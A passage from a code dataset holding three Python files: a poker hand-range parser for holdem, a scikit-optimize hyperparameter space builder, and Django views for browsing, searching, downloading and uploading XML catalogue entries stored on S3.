re.compile('''\n\t\t\t\t\t\\A\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?Ps|o)?\n\t\t\t\t\t(?P\\+)?\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % (ReRanks, ReRanks), re.X)\n\tPatHandTypeSuitRange = re.compile('''\n\t\t\t\t\t\\A\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?Ps|o)?\n\t\t\t\t\t\\-\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?Ps|o)?\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % (ReRanks, ReRanks, ReRanks, ReRanks), re.X)\n\t\n\t@classmethod\n\tdef fromString(klass, string):\n\t\t\"\"\"creates a hand range from a string containg hand patterns\n\t\t@param string: (str) \n\t\t@return: L{HandRange}\n\t\t\n\t\t\"\"\"\n\t\thandRange = klass()\n\t\t# clean string\n\t\tp = string.replace(' ', '').replace('\\t', '')\n\t\tp = p.split(',')\n\t\tfor s in p:\n\t\t\tif not s: continue\n\t\t\t\t\t\n\t\t\tif s == 'random':\n\t\t\t\tdeck = Deck()\n\t\t\t\tfor cards in itertools.combinations(deck.cards, 2):\n\t\t\t\t\thand = Hand.fromCards(*cards)\n\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tbreak\n\t\t\t\t\t\t\n\t\t\telif s == 'suited':\n\t\t\t\tp.extend([\n\t\t\t\t\t\t'A2s+',\n\t\t\t\t\t\t'K2s+',\n\t\t\t\t\t\t'Q2s+',\n\t\t\t\t\t\t'J2s+',\n\t\t\t\t\t\t'T2s+',\n\t\t\t\t\t\t'92s+',\n\t\t\t\t\t\t'82s+',\n\t\t\t\t\t\t'72s+',\n\t\t\t\t\t\t'62s+',\n\t\t\t\t\t\t'52s+',\n\t\t\t\t\t\t'42s+',\n\t\t\t\t\t\t'32s+',\n\t\t\t\t\t\t])\n\t\t\t\tcontinue\n\t\t\t\t\n\t\t\telif s == 'offsuit':\n\t\t\t\tp.extend([\n\t\t\t\t\t\t'A2o+',\n\t\t\t\t\t\t'K2o+',\n\t\t\t\t\t\t'Q2o+',\n\t\t\t\t\t\t'J2o+',\n\t\t\t\t\t\t'T2o+',\n\t\t\t\t\t\t'92o+',\n\t\t\t\t\t\t'82o+',\n\t\t\t\t\t\t'72o+',\n\t\t\t\t\t\t'62o+',\n\t\t\t\t\t\t'52o+',\n\t\t\t\t\t\t'42o+',\n\t\t\t\t\t\t'32o+',\n\t\t\t\t\t\t])\n\t\t\t\tcontinue\n\t\t\t\n\t\t\telif s == 'broadways':\n\t\t\t\tp.extend([\n\t\t\t\t\t\t'TT+',\n\t\t\t\t\t\t'AT+',\n\t\t\t\t\t\t'KT+',\n\t\t\t\t\t\t'QT+',\n\t\t\t\t\t\t'JT+',\n\t\t\t\t\t\t])\n\t\t\t\tcontinue\n\t\t\telif s == 'pairs':\n\t\t\t\tp.append('22+')\n\t\t\t\tcontinue\t\n\t\t\t\t\t\t\n\t\t\t# substring is a hand --> 'Kh7d'\n\t\t\t#\n\t\t\tresult = klass.PatHand.match(s)\n\t\t\tif result is not None:\n\t\t\t\tcard1, card2 = Card(result.group('card1')), Card(result.group('card2'))\n\t\t\t\thand = Hand.fromCards(card1, card2)\n\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t# substring is a 
handTypePair --> 'TT' or 'TT+'\n\t\t\t#\n\t\t\tresult = klass.PatHandTypePair.match(s)\n\t\t\tif result is not None:\n\t\t\t\trank = result.group('rank')\n\t\t\t\thands = handTypeToHands(rank+rank)\n\t\t\t\tfor hand in hands:\n\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\t\n\t\t\t\t# expand pattern if necessary\n\t\t\t\tqualifier = result.group('qualifier')\n\t\t\t\tif qualifier:\n\t\t\t\t\tiRank = Card.RankNames.index(rank)\n\t\t\t\t\tfor otherRank in Card.RankNames[iRank +1:]:\n\t\t\t\t\t\tp.append(otherRank + otherRank)\n\t\t\t\tcontinue\n\t\t\t\t\t\t\t\t\n\t\t\t# substring is a handTypeSuit --> 'KTs', 'KTs+', 'KTo' or 'KT'\n\t\t\t#\n\t\t\t#NOTE: PokerTracker handles 'KT' but not 'KT+', we do\n\t\t\tresult = klass.PatHandTypeSuit.match(s)\n\t\t\tif result is not None:\n\t\t\t\trank1 = result.group('rank1')\n\t\t\t\trank2 = result.group('rank2')\n\t\t\t\trank1, rank2 = klass._sortedCardRanks(rank1, rank2, revert=True)\n\t\t\t\tsuit = result.group('suit')\n\t\t\t\tqualifier = result.group('qualifier')\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t# got a pair - assume typo - PokerStove does so as well (?)\n\t\t\t\tif rank1 == rank2:\n\t\t\t\t\tif qualifier:\n\t\t\t\t\t\tp.append('%s%s%s' % (rank1, rank1, qualifier))\n\t\t\t\t\telse:\n\t\t\t\t\t\tp.append('%s%s' % (rank1, rank1))\n\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\n\t\t\t\tif suit:\n\t\t\t\t\thands = handTypeToHands(rank1+rank2+suit)\n\t\t\t\telse:\n\t\t\t\t\thands = handTypeToHands(rank1+rank2+'s') + handTypeToHands(rank1+rank2+'o')\n\t\t\t\tfor hand in hands:\n\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\t\n\t\t\t\t# expand pattern if necessary\n\t\t\t\tif qualifier:\n\t\t\t\t\tiRank1 = Card.RankNames.index(rank1)\n\t\t\t\t\tiRank2 = Card.RankNames.index(rank2)\n\t\t\t\t\tfor otherRank in Card.RankNames[iRank2 +1:iRank1]:\n\t\t\t\t\t\tif otherRank == rank1: continue\n\t\t\t\t\t\tif suit:\n\t\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + otherRank + suit):\n\t\t\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + otherRank + 's'):\n\t\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + otherRank + 'o'):\n\t\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t# substring is a handTypePairRange --> '22-TT'\n\t\t\t#\n\t\t\tresult = klass.PatHandTypePairRange.match(s)\n\t\t\tif result is not None:\n\t\t\t\trank1 = result.group('rank1')\n\t\t\t\trank2 = result.group('rank2')\n\t\t\t\trank1, rank2 = klass._sortedCardRanks(rank1, rank2, revert=False)\n\t\t\t\tiRank1 = Card.RankNames.index(rank1)\n\t\t\t\tiRank2 = Card.RankNames.index(rank2)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t# expand pattern\n\t\t\t\tranks = Card.RankNames[iRank1:iRank2+1]\n\t\t\t\tfor rank in ranks:\n\t\t\t\t\tfor hand in handTypeToHands(rank + rank):\n\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tcontinue\n\t\t\t\t\t\t\t\n\t\t\t# substring is a handTypeSuiteRange --> 'K7s-KTs', 'KT-K7', 'KTo-K7', ...\n\t\t\t#\n\t\t\tresult = klass.PatHandTypeSuitRange.match(s)\n\t\t\tif result is not None:\n\t\t\t\trank1 = result.group('rank1')\n\t\t\t\trank2 = result.group('rank2')\n\t\t\t\trank1, rank2 = klass._sortedCardRanks(rank1, rank2, revert=True)\n\t\t\t\trank3 = result.group('rank3')\n\t\t\t\trank4 = result.group('rank4')\n\t\t\t\trank3, rank4 = klass._sortedCardRanks(rank3, rank4, revert=True)\n\t\t\t\t# sort rank2 and 4 once again so we get ascending ranks for expanding\n\t\t\t\trank2, rank4 = klass._sortedCardRanks(rank2, rank4, 
revert=False)\n\t\t\t\tif rank1 != rank3:\n\t\t\t\t\traise klass.ParseError('invalid range: %s' % s)\n\t\t\t\t# determine suit\n\t\t\t\tsuit1 = result.group('suit1')\n\t\t\t\tsuit2 = result.group('suit2')\n\t\t\t\tif suit1:\n\t\t\t\t\tsuit = suit1\n\t\t\t\telif suit2:\n\t\t\t\t\tsuit = suit2\n\t\t\t\telse:\n\t\t\t\t\tsuit = None\n\t\t\t\t\t\t\t\n\t\t\t\t# expand pattern\n\t\t\t\tiRank2 = Card.RankNames.index(rank2)\n\t\t\t\tiRank4 = Card.RankNames.index(rank4)\n\t\t\t\tranks = Card.RankNames[iRank2:iRank4+1]\n\t\t\t\tfor rank in ranks:\n\t\t\t\t\tif suit:\n\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + rank + suit):\n\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + rank + 's'):\n\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + rank + 'o'):\n\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tcontinue\n\t\t\t\n\t\t\t#\n\t\t\traise klass.ParseError('invalid hand pattern: %s' % s)\t\n\t\t\n\t\t# finally\t\t\n\t\treturn handRange\n\t\t\t\n\t@classmethod\n\tdef _sortedCardRanks(self, rank1, rank2, revert=False):\n\t\tiRank1 = Card.RankNames.index(rank1)\n\t\tiRank2 = Card.RankNames.index(rank2)\n\t\tif revert and iRank1 < iRank2:\n\t\t\treturn (rank2, rank1)\n\t\telif not revert and iRank2 < iRank1:\n\t\t\treturn (rank2, rank1)\n\t\treturn (rank1, rank2)\n\t\t\n\tdef __init__(self, hands=None):\n\t\t\"\"\"\n\t\t@param hands: (list) or L{Hand}s or None to create an empty hand range\n\t\t\"\"\"\n\t\tself._hands = set() if hands is None else set(hands)\n\t\t\t\t\n\tdef __contains__(self, hand):\n\t\treturn hand in self._hands\n\t\t\n\tdef __len__(self):\n\t\treturn len(self._hands)\n\t\t\n\tdef __iter__(self):\n\t\treturn iter(self._hands)\n\t\t\n\tdef toString(self):\n\t\t\"\"\"dumps the hand range to a string representing a hand range pattern\n\t\t@return: (str)\n\t\t\"\"\"\n\n\t\tif len(self) == 1326:\n\t\t\treturn 'random'\n\t\t\n\t\t# precompute hand types of our hands\n\t\thandTypes = dict([(handType, []) for handType in genHandTypes()])\n\t\tfor hand in self:\n\t\t\thandType = handTypeFromHand(hand)\n\t\t\thandTypes[handType].append(hand) \n\t\t\n\t\t# dump our hands to handType table\n\t\thandTypeTable = genHandTypeTable()\n\t\tfor row in handTypeTable:\n\t\t\tfor iCol, handType in enumerate(row):\n\t\t\t\t# assign dict handTypeData to each cell\n\t\t\t\tif handTypeIsPair(handType):\n\t\t\t\t\tnCardsExpected = 6\n\t\t\t\t\ttype = 'pair'\n\t\t\t\t\trank = Card.RankNames.index(handType[0])\n\t\t\t\t\trankSignificant = Card.RankNames.index(handType[0])\n\t\t\t\t\tnCardsExpected = 6\n\t\t\t\telif handTypeIsSuited(handType):\n\t\t\t\t\ttype = 'suited'\n\t\t\t\t\tnCardsExpected = 4\n\t\t\t\t\trank = Card.RankNames.index(handType[0])\n\t\t\t\t\trankSignificant = Card.RankNames.index(handType[1])\n\t\t\t\telse:\n\t\t\t\t\ttype = 'offsuit'\n\t\t\t\t\tnCardsExpected = 12\n\t\t\t\t\trank = Card.RankNames.index(handType[0])\n\t\t\t\t\trankSignificant = Card.RankNames.index(handType[1])\t\n\t\t\t\trow[iCol] = {\n\t\t\t\t\t\t'type': type,\n\t\t\t\t\t\t'handType': handType,\n\t\t\t\t\t\t'rank': rank,\n\t\t\t\t\t\t'rankSignificant': rankSignificant,\n\t\t\t\t\t\t'nCardsExpected': nCardsExpected,\n\t\t\t\t\t\t'hands': handTypes[handType],\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t# expand handTypeTable in traverse order\n\t\thandTypes = []\n\t\tfor delta in xrange(13):\n\t\t\tpair = handTypeTable[delta][delta]\n\t\t\thandTypes.append(pair)\n\t\t\tsuited = [handTypeTable[delta][i] for i in xrange(delta 
+1, 13)]\n\t\t\thandTypes.extend(suited)\n\t\t\toffsuit = [handTypeTable[i][delta] for i in xrange(delta +1, 13)]\n\t\t\thandTypes.extend(offsuit)\n\t\t\n\t\t# accumulate hands to ranges\n\t\tranges = {'pair': [], 'suited': [], 'offsuit': []}\n\t\tfor handTypeData in handTypes:\n\t\t\trng = ranges[handTypeData['type']]\n\t\t\tif not handTypeData['hands']:\n\t\t\t\tcontinue\n\t\t\tif len(handTypeData['hands']) == handTypeData['nCardsExpected']:\n\t\t\t\tif not rng:\n\t\t\t\t\trng.append([])\n\t\t\t\tlastSlc = rng[-1]\n\t\t\t\tif not lastSlc:\n\t\t\t\t\tlastSlc.append(handTypeData)\n\t\t\t\telif lastSlc[-1]['nCardsExpected'] != len(lastSlc[-1]['hands']):\n\t\t\t\t\trng.append([handTypeData,] )\n\t\t\t\telse:\n\t\t\t\t\trankCurrent = handTypeData['rank']\n\t\t\t\t\trankSignificantCurrent = handTypeData['rankSignificant']\n\t\t\t\t\trankLast = lastSlc[-1]['rank']\n\t\t\t\t\trankSignificantLast = lastSlc[-1]['rankSignificant']\n\t\t\t\t\t# case pairs\n\t\t\t\t\tif handTypeData['type'] == 'pair':\n\t\t\t\t\t\tif rankSignificantCurrent +1 == rankSignificantLast:\n\t\t\t\t\t\t\tlastSlc.append(handTypeData)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\trng.append([handTypeData,] )\n\t\t\t\t\t#case unpaired hands\n\t\t\t\t\telse:\n\t\t\t\t\t\tif rankLast == rankCurrent and \\\n\t\t\t\t\t\t\t\trankSignificantCurrent +1 == rankSignificantLast:\n\t\t\t\t\t\t\tlastSlc.append(handTypeData)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\trng.append([handTypeData,] )\t\n\t\t\telse:\n\t\t\t\trng.append([handTypeData,] )\n\t\t\t\t\n\t\t# process ranges\n\t\tresult = []\n\t\tfor rngName in ('pair', 'suited', 'offsuit'):\n\t\t\trng = ranges[rngName]\n\t\t\tfor slc in rng:\n\t\t\t\tif len(slc) > 1:\n\t\t\t\t\t# slice is a range of hands\n\t\t\t\t\tif slc[0]['type'] == 'pair' and slc[0]['rankSignificant'] == 12:\n\t\t\t\t\t\t# handle special case like: 'TT+'\n\t\t\t\t\t\tresult.append( '%s+' % slc[-1]['handType'])\n\t\t\t\t\telif slc[0]['rankSignificant'] +1 == slc[0]['rank']:\n\t\t\t\t\t\t# handle special case like: 'KTs+', 'KTo+'\n\t\t\t\t\t\tresult.append( '%s+' % slc[-1]['handType'])\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult.append( '%s-%s' % (slc[0]['handType'], slc[-1]['handType']))\n\t\t\t\telif len(slc[0]['hands']) == slc[0]['nCardsExpected']:\n\t\t\t\t\t# slice is a single handType containing all cards for the handType\n\t\t\t\t\tresult.append(slc[0]['handType'])\n\t\t\t\telse:\n\t\t\t\t\t# slice is a single HandType with not enough cards to cmplete the handType\n\t\t\t\t\tfor hand in slc[0]['hands']:\n\t\t\t\t\t\ts = hand.toString()\n\t\t\t\t\t\ts = s.replace('[', '').replace(']', '').replace('\\x20', '')\n\t\t\t\t\t\tresult.append(s)\n\t\t\t\t\t\t\n\t\treturn ', '.join(result)\n","repo_name":"minafaw/tablecrab","sub_path":"src/Tc2Lib/PtHandRangeHoldem.py","file_name":"PtHandRangeHoldem.py","file_ext":"py","file_size_in_byte":12111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42598004737","text":"import skopt\n\n\ndef skopt_space(hyper_to_opt):\n \"\"\"Create space of hyperparameters for the gaussian processes optimizer.\n\n This function creates the space of hyperparameter following skopt syntax.\n\n Parameters:\n hyper_to_opt (dict): dictionary containing the configuration of the\n hyperparameters to optimize. This dictionary must follow the next\n syntax:\n\n .. 
code:: python\n\n hyper_to_opt = {'hyperparam_1': {'type': ...,\n 'range: ...,\n 'step': ...},\n 'hyperparam_2': {'type': ...,\n 'range: ...,\n 'step': ...},\n ...\n }\n\n See the oficial documentation for more details.\n\n Returns:\n list: space of hyperparameters following the syntax required by the\n gaussian processes optimization algorithm.\n\n Example::\n\n hyper_top_opt = {\n 'cnn_rnn_dropout':{\n 'type': 'uniform',\n 'range': [0,1]},\n 'optimizer_type':{\n 'type': 'choice',,\n 'range': ['Adadelta', 'Adam', 'RMSProp', 'SGD']},\n 'base_learning_rate':{\n 'type': 'loguniform',\n 'range': [-5, 0]},\n 'layer1_filters':{\n 'type': 'quniform',\n 'range': [16, 64],\n 'step': 1}}\n\n Raises:\n KeyError: if ``type`` is other than ``uniform``, ``quniform``,\n ``loguniform`` or ``choice``.\n \"\"\"\n\n space = []\n # loop over the hyperparameters to optimize dictionary and add each\n # hyperparameter to the space\n for key, items in hyper_to_opt.items():\n if items['type'] == 'uniform':\n space.append(skopt.space.Real(items['range'][0],\n items['range'][1],\n name=key))\n elif items['type'] == 'quniform':\n space.append(skopt.space.Integer(items['range'][0],\n items['range'][1],\n name=key))\n elif items['type'] == 'loguniform':\n space.append(skopt.space.Real(items['range'][0],\n items['range'][1],\n name=key,\n prior='log-uniform'))\n elif items['type'] == 'choice':\n space.append(skopt.space.Categorical(items['range'],\n name=key))\n else:\n raise KeyError('The gaussian processes optimizer supports only \\\n uniform, quniform, loguniform and choice space types')\n return space\n","repo_name":"ctlearn-project/ctlearn_optimizer","sub_path":"src/ctlearn_optimizer/bayesian_gp.py","file_name":"bayesian_gp.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44046034432","text":"from django.conf import settings\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom .models import CatalogueEntries\nfrom .graph import make_graphs\nfrom .forms import DocumentForm\nfrom .models import SubmittedCatelogueEntries\nfrom urllib.request import urlopen\n\nimport os\nfrom io import BytesIO\nimport xml.dom.minidom\nimport xml.etree.ElementTree as ET\nimport zipfile\nimport boto3\n\nALL_DOWNLOAD_GROUP = []\nSEARCH_DOWNLOAD_GROUP = []\nSG_FILE = None\ns3 = boto3.resource('s3', region_name=settings.AWS_S3_REGION_NAME)\nbucket = s3.Bucket(settings.AWS_BUCKET)\n\n\ndef get_names(directory):\n \"\"\"\n Returns a list of file names and a list of directories\n within the location of \"directory\"\n \"\"\"\n contents = os.listdir(directory)\n files, directories = [], []\n for item in contents:\n candidate = os.path.join(directory, item)\n if os.path.isdir(candidate):\n directories.append(item)\n else:\n files.append(item)\n return files, directories\n\n\ndef _get_abs_virtual_root():\n return settings.PUBLISHED_CATALOGUE_DIR\n\n\ndef download(request, path):\n if os.path.exists(path):\n rel_path = os.path.relpath(path, start=settings.AWS_URL)\n url = bucket.get_key(rel_path).generate_url(expires_in=1200)\n return HttpResponseRedirect(url)\n\n\ndef _make_zip(zip_subdir, files):\n zip_filename = \"%s.zip\" % zip_subdir\n s = BytesIO()\n zf = zipfile.ZipFile(s, \"w\")\n for fpath in files:\n subdir = os.path.relpath(fpath, start=settings.PUBLISHED_CATALOGUE_DIR)\n data = \"\\n\".join(_get_xml_content(fpath))\n zf.writestr(subdir, data)\n zf.close()\n resp 
= HttpResponse(s.getvalue(), content_type=\"application/x-zip-compressed\")\n resp['Content-Disposition'] = 'attachment; filename=%s' % zip_filename\n return resp\n\n\ndef all_catalogue_download(request):\n global bucket\n client = boto3.client(\"s3\", region_name=settings.AWS_S3_REGION_NAME)\n rel_path = os.path.relpath(settings.ALL_ENTRIES_DOWNLOAD, start=settings.AWS_URL)\n url = client.generate_presigned_url(\n 'get_object',\n Params = {\n 'Bucket': settings.AWS_BUCKET,\n 'Key': rel_path, },\n ExpiresIn=600, )\n return HttpResponseRedirect(url)\n\n\ndef search_download(request):\n global SEARCH_DOWNLOAD_GROUP\n if SEARCH_DOWNLOAD_GROUP:\n files = list()\n zip_subdir = \"searched_catalogue_entries\"\n for file in SEARCH_DOWNLOAD_GROUP:\n files.append(file)\n resp = _make_zip(zip_subdir, files)\n return resp\n else:\n raise TypeError(\"Files path are not set correctly.\")\n\n\ndef download_material(request, mode):\n global bucket\n if mode == \"anno\":\n rel_path = os.path.relpath(settings.ANNO_PATH, start=settings.AWS_URL)\n elif mode == \"xsd\":\n rel_path = os.path.relpath(settings.XSD_PATH, start=settings.AWS_URL)\n client = boto3.client(\"s3\", region_name=settings.AWS_S3_REGION_NAME)\n url = client.generate_presigned_url(\n 'get_object',\n Params={\n 'Bucket': settings.AWS_BUCKET,\n 'Key': rel_path, },\n ExpiresIn=600, )\n return HttpResponseRedirect(url)\n\n\ndef _stylize_graphs(tree, file_path, target_graph_dir, content):\n global bucket\n prefix = os.path.relpath(target_graph_dir, settings.AWS_URL)+'/'\n images = bucket.objects.filter(Delimiter='/', Prefix=prefix)\n if images:\n content[\"graphs\"] = [settings.AWS_URL+img.key for img in images]\n else:\n make_graphs(tree, file_path, settings.GRAPH_DIR)\n try:\n graphs = os.listdir(target_graph_dir)\n content[\"graphs\"] = graphs\n except FileNotFoundError:\n content[\"graphs\"] = None\n\n\ndef _view_file(request, file_path, mode):\n data = _list_directory(request, status='published')\n\n content = {\n 'ordered_keys': data[\"ordered_keys\"],\n 'files': data[\"files\"],\n 'sub_dirs': data[\"sub_dirs\"],\n 'file_path': file_path\n }\n\n if mode == \"style\":\n tree = _get_xml_tree(file_path)\n styled_info = _get_xml_styled(tree)\n content[\"mode\"] = mode\n target_graph_dir = os.path.join(settings.GRAPH_DIR, os.path.splitext(os.path.basename(file_path))[0])\n\n if styled_info:\n for key, val in styled_info.items():\n content[key] = val\n\n _stylize_graphs(tree, file_path, target_graph_dir, content)\n\n elif mode == \"text\":\n file_content = _get_xml_content(file_path)\n content[\"file_content\"] = file_content\n content[\"mode\"] = mode\n content[\"test\"] = \"test\"\n return render(request, \"catalogue/catalogue_view.html\", content)\n\n\ndef _get_xml_content(xml_url):\n xml_string = []\n for line in urlopen(xml_url):\n xml_string.append(line.decode('utf-8'))\n xml_string = \"\\t\".join(xml_string)\n dom = xml.dom.minidom.parseString(xml_string)\n file_content = []\n for line in dom.toprettyxml().split('\\n'):\n if len(line.strip()) != 0:\n file_content.append(line)\n return file_content\n\n\ndef _get_xml_tree(xml_url):\n xml_string = []\n for line in urlopen(xml_url):\n xml_string.append(line.decode('utf-8'))\n xml_string = \"\\t\".join(xml_string)\n return ET.ElementTree(ET.fromstring(xml_string))\n\n\ndef _get_xml_styled(tree):\n \"\"\"\n De-serialization of xml files into dictionaries\n \"\"\"\n try:\n concept = tree.getroot().find(\"concept\")\n if concept:\n info = concept.find(\"info\").attrib\n concept_id = info[\"id\"]\n 
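# the remaining <info> attributes are the concept name, its version and an optional frameNetLink\n            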
name = info[\"name\"]\n version = info[\"version\"]\n framenet_link = info[\"frameNetLink\"] if \"frameNetLink\" in info.keys() else None\n roles = concept.find(\"roles\")\n core_roles = [core_role.text for core_role in roles.findall(\"./coreRoles/coreRole\")]\n non_core_roles = [non_core_role.text for non_core_role in roles.findall(\"./nonCoreRoles/nonCoreRole\")]\n description = concept.find(\"description\").text\n super_classes = [super_class.text for super_class in concept.findall(\"./superClasses/class\")]\n examples = [example.text for example in concept.findall(\"./examples/example\")]\n if not examples:\n examples = [\"None\"]\n style_content = {\n \"concept_id\": concept_id,\n \"name\": name,\n \"version\": version,\n \"core_roles\": core_roles,\n \"non_core_roles\": non_core_roles,\n \"description\": description,\n \"super_classes\": super_classes,\n \"examples\": examples\n }\n if framenet_link:\n style_content[\"framenet_link\"] = framenet_link\n else:\n style_content = None\n except Exception:\n raise ValueError(\"xml file poorly constructed!\")\n return style_content\n\n\ndef _get_link_target(path):\n link_target = os.path.relpath(path, start=settings.PUBLISHED_CATALOGUE_DIR)\n return link_target\n\n\ndef _to_lower(text):\n return text.lower()\n\n\ndef _make_sort_key(subdir, basename):\n if subdir == '':\n sort_key = os.path.splitext(basename)[0]\n else:\n sort_key = subdir\n return sort_key\n\n\ndef _sort_all_keys(all_files_info, all_dir_info):\n key_order = sorted(list(all_files_info.keys()) + list(all_dir_info.keys()))\n return key_order\n\n\ndef _get_all_files_from_db(status=\"published\"):\n return list(CatalogueEntries.objects.all())\n\n\ndef _list_directory(request, status='published'):\n if check_access(request):\n if status == 'published':\n all_files_info = {}\n all_dir_info = {}\n global ALL_DOWNLOAD_GROUP\n ALL_DOWNLOAD_GROUP.clear()\n for entry in _get_all_files_from_db():\n path = entry.entry_path\n basename = entry.entry_name\n subdir = entry.belongs_to_sub_directory\n sort_key = _make_sort_key(subdir, basename)\n link_target = subdir+\"/\"+basename\n ALL_DOWNLOAD_GROUP.append(path)\n if subdir == '':\n all_files_info[sort_key] = (link_target, basename)\n else:\n if sort_key not in all_dir_info.keys():\n all_dir_info[sort_key] = [\n (link_target, basename)]\n else:\n all_dir_info[sort_key].append(\n (link_target, basename))\n\n for key, val in all_dir_info.items():\n all_dir_info[key] = [\n tup for tup in sorted(\n val, key=lambda v:v[1])]\n ordered_keys = _sort_all_keys(\n all_files_info, all_dir_info)\n data = {\n 'ordered_keys': ordered_keys,\n 'files': all_files_info,\n 'sub_dirs': all_dir_info,\n }\n return data\n\n raise PermissionError\n\n\ndef check_access(request):\n \"\"\"Check if the user has proper access\"\"\"\n return True\n\n\ndef browse(request, path, mode):\n \"\"\"Directory list view\n There is a possibility that this function is going to be used somewhere else\n In which case, there should be an independent app in the project\n But we'll see if there's this need. I'll change accordingly.\n \"\"\"\n catalogue_path = os.path.join(settings.PUBLISHED_CATALOGUE_DIR, path)\n\n if catalogue_path.endswith('.xml'):\n if mode == \"\":\n mode = \"text\"\n return _view_file(request, catalogue_path, mode)\n else:\n return render(\n request,\n 'catalogue/catalogue_view.html',\n _list_directory(\n request, status='published'))\n # If the path points to a file, view it. 
If not, list out files in the\n # directory\n\n\ndef _search_files(request, query):\n matched_files_links = []\n global SEARCH_DOWNLOAD_GROUP\n SEARCH_DOWNLOAD_GROUP.clear()\n if len(query.strip()) != 0:\n all_files_info = _get_all_files_from_db()\n all_files_path_name = [(p.entry_path, p.entry_name)\n for p in all_files_info]\n for file_path, file_basename in all_files_path_name:\n if query in file_path.lower():\n matched_files_links.append(\n (file_path, file_basename))\n SEARCH_DOWNLOAD_GROUP.append(file_path)\n if len(matched_files_links) != 0:\n data = {\n 'search_results': matched_files_links,\n 'original_query': query\n }\n else:\n data = {\n 'no_results': ['Ops, no search results. Click me to go back to catalogue']}\n else:\n data = _list_directory(request)\n return data\n\n\ndef search(request):\n srh = request.GET['query'].lower()\n data = _search_files(request, srh)\n return render(request, 'catalogue/catalogue_view.html', data)\n\n\ndef search_view(request, link, query, mode=\"text\"):\n data = _search_files(request, query)\n if link:\n content = _get_xml_content(link)\n data['file_content'] = content\n data['file_path'] = link\n data['mode'] = mode\n return render(request, 'catalogue/catalogue_view.html', data)\n\n\ndef generate_sg(file_path, name):\n tree = _get_xml_tree(file_path)\n out_path = settings.TEMP_DIR\n make_graphs(tree, file_path, out_path)\n try:\n prefix = os.path.relpath(os.path.join(out_path, name[:-4]), settings.AWS_URL) + '/'\n graphs = [settings.AWS_URL + g.key for g in bucket.objects.filter(Prefix=prefix)]\n # graphs = os.listdir(os.path.join(out_path, name[:-4]+\"/\"))\n except:\n graphs = []\n return graphs\n\n\ndef _handle_uploaded_file(f, name):\n try:\n upload_path = os.path.join(settings.TEMP_DIR, name)\n bucket.upload_fileobj(f, os.path.relpath(upload_path, settings.AWS_URL))\n except:\n TypeError(os.path.relpath(settings.TEMP_DIR+name, settings.AWS_URL))\n \"\"\"\n with open(os.path.join(settings.TEMP_DIR, name), 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n \"\"\"\n\n\ndef submit_sg_generation(request):\n global SG_FILE\n message = 'Please select the file for Semantic Graph generating.'\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n SG_FILE = request.FILES['docfile']\n _handle_uploaded_file(SG_FILE, SG_FILE.name)\n redirect('generate_sg')\n else:\n message = 'The file format is not valid. Please validate your xml file.'\n else:\n form = DocumentForm()\n if SG_FILE:\n file_path = os.path.join(settings.TEMP_DIR, SG_FILE.name)\n try:\n graphs = generate_sg(file_path, SG_FILE.name)\n except Exception:\n graphs = None\n message = 'The file format is not valid. 
Please validate your xml file.'\n else:\n file_path = None\n graphs = None\n content = {'graphs': graphs, 'form': form, 'message': message, 'file_path': file_path}\n return render(request, 'catalogue/catalogue_sg.html', content)\n\n\ndef upload_file(request):\n message = 'Please upload a single file or a zipped file.'\n # Handle file upload\n if request.user.is_authenticated:\n username = request.user.username\n user_email = request.user.email\n else:\n username = None\n user_email = None\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n newdoc = SubmittedCatelogueEntries(docfile=request.FILES['docfile'])\n newdoc.set_uploader(username, user_email)\n newdoc.save()\n\n # Redirect to the document list after POST\n return redirect('submit')\n else:\n message = 'The form is not valid. Fix the following error:'\n else:\n form = DocumentForm() # An empty, unbound form\n\n # Load documents for the list page\n documents = [doc for doc in SubmittedCatelogueEntries.objects.all() if doc.username == username]\n\n # Render list page with the documents and the form\n context = {'documents': documents, 'form': form, 'message': message}\n return render(request, 'catalogue/upload_annotation.html', 